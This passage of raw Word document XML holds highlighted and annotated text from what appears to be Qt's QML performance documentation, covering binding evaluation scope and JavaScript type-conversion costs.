          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>calling JavaScript functions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="004021B8" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">constructing closures </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or defining functions within the binding expression</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="004021B8" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accessing properties outside of the immediate evaluation scope</w:t>
      </w:r>
      <w:r w:rsidR="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00615FAD" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00615FAD" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00615FAD" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> what is this scope?</w:t>
      </w:r>
      <w:r w:rsidR="00615FAD" w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>writing to other properties as side effects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00E458AC" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bindings are </w:t>
      </w:r>
      <w:r w:rsidRPr="00687A43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quickest when they know the type of objects and properties they are working with</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This means that non-final property lookup in a binding expression can be slower in some cases, where it is possible that the type of the property being looked up has been changed (</w:t>
      </w:r>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for example, by a derived type</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00E458AC" w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu this use-case</w:t>
      </w:r>
      <w:r w:rsidR="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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The </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>immediate evaluation scope</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be summarized by saying that it contains:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties of the expression scope object</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for binding expressions, this is the object to which the property binding belongs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="004021B8" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ids of any objects in the component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="004021B8" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the properties of the root item in the component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4021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ids of objects from other components and properties of any such objects, as well as symbols defined in or included from a JavaScript import, are not </w:t>
      </w:r>
      <w:r w:rsidRPr="004021B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the immediate evaluation scope</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and thus bindings which access any of those things will not be optimized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="000210E9" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if a binding</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot be optimized by the QML engine's optimized binding expression evaluator, and thus </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be evaluated by the full JavaScript environment,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000210E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>some of the tips listed above will no longer apply</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, it can sometimes be beneficial to cache the result of property resolution in an intermediate JavaScript variable in a very complex binding</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upcoming sections have more information on these sorts of optimizations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00E458AC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="878" w:name="type-conversion"/>
      <w:bookmarkStart w:id="879" w:name="_Toc483000716"/>
      <w:bookmarkStart w:id="880" w:name="_Toc483003733"/>
      <w:bookmarkStart w:id="881" w:name="_Toc483604068"/>
      <w:bookmarkStart w:id="882" w:name="_Toc483605288"/>
      <w:bookmarkEnd w:id="878"/>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type-Conversion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="879"/>
      <w:bookmarkEnd w:id="880"/>
      <w:bookmarkEnd w:id="881"/>
      <w:bookmarkEnd w:id="882"/>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One </w:t>
      </w:r>
      <w:r w:rsidRPr="0073420A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>major cost of using JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that in most cases when a property from a QML type is accessed, a </w:t>
      </w:r>
      <w:r w:rsidRPr="0073420A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript object with an external resource containing the underlying C++ data (or a reference to it) is created.</w:t>
      </w:r>
      <w:r w:rsidR="0073420A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In m</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ost cases, this is fairly inexpensive</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but in others </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">it can </w:t>
      </w:r>
      <w:r w:rsidRPr="0073420A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be quite expensive</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. One example of where it is expensive is </w:t>
      </w:r>
      <w:r w:rsidRPr="0073420A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assigning a C++</w:t>
      </w:r>
      <w:r w:rsidRPr="0073420A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId616" w:anchor="QVariantMap-typedef" w:history="1">
        <w:r w:rsidRPr="0073420A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariantMap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E458AC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId617" w:anchor="Q_PROPERTY" w:history="1">
        <w:r w:rsidRPr="0073420A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_PROPERTY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E458AC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0073420A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to a QML "variant" property</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0073420A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lists</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be expensive, although sequences of specific types (</w:t>
      </w:r>
      <w:hyperlink r:id="rId618" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of int, qreal, bool,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId619" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QString</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId620" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QUrl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
